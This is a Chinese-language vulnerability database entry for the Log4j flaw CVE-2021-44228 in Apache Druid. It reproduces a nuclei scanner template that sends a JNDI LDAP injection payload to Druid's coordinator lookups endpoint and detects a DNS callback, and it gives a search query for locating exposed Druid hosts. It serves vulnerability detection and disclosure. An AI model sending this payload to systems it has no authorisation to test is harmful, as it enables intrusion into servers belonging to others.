Apache Druid Remote Code Execution (Apache Log4j) Vulnerability

漏洞信息

漏洞名称: Apache Druid Remote Code Execution (Apache Log4j) Vulnerability

漏洞编号:

  • CVE: CVE-2021-44228

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Apache Druid是一个高性能的实时分析数据库,广泛应用于大数据分析和实时查询场景。它支持快速的数据摄取和查询,常用于企业级数据分析服务。由于其高效的处理能力,Apache Druid在多个行业中有广泛的应用。该漏洞源于Apache Druid中使用的Log4j组件存在远程代码执行漏洞,具体为CVE-2021-44228。Log4j是一个广泛使用的Java日志框架,由于未能正确处理用户提供的输入,攻击者可以通过构造特殊的日志消息触发JNDI注入,从而在目标服务器上执行任意代码。这种漏洞的利用不需要用户交互,攻击者只需发送特制的请求即可触发漏洞,导致服务器被完全控制。由于Apache Druid通常部署在企业内部网络或云环境中,一旦被利用,可能导致敏感数据泄露、服务中断甚至整个系统被入侵。该漏洞的CVSS评分为10分,属于最高级别的安全威胁。

产品厂商: apache

产品名称: Apache Druid

影响版本: *

搜索语法: title:”Apache Druid”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/01a59299771e9178d0aadf2065d772c10e58fac8/http%2Fvulnerabilities%2Fother%2Fapache-druid-log4j.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

id: apache-druid-log4j

info:
name: Apache Druid - Remote Code Execution (Apache Log4j)
author: SleepingBag945
severity: critical
description: Apache Druid is vulnerable to RCE due to Log4j.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-502
cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Apache Druid"
product: druid
vendor: apache
tags: cve,cve2021,rce,jndi,log4j,apache,druid,oast,kev

http:
- method: DELETE
path:
- "{{BaseURL}}/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{interactsh-url}}%2ftea%7d"

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

- type: word
part: header
words:
- "application/json"

- type: status
status:
- 404
# digest: 490a00463044022073ad4a0841fc50dcf08fa6bb89278c2d4fff6550f2de4b828a1f05f56c872e2202201dab25b8c44ec6598979137727b67cf82d97ade0868505560b37b0aac6de7adf:922c64590222798bb761d5b6d8e72950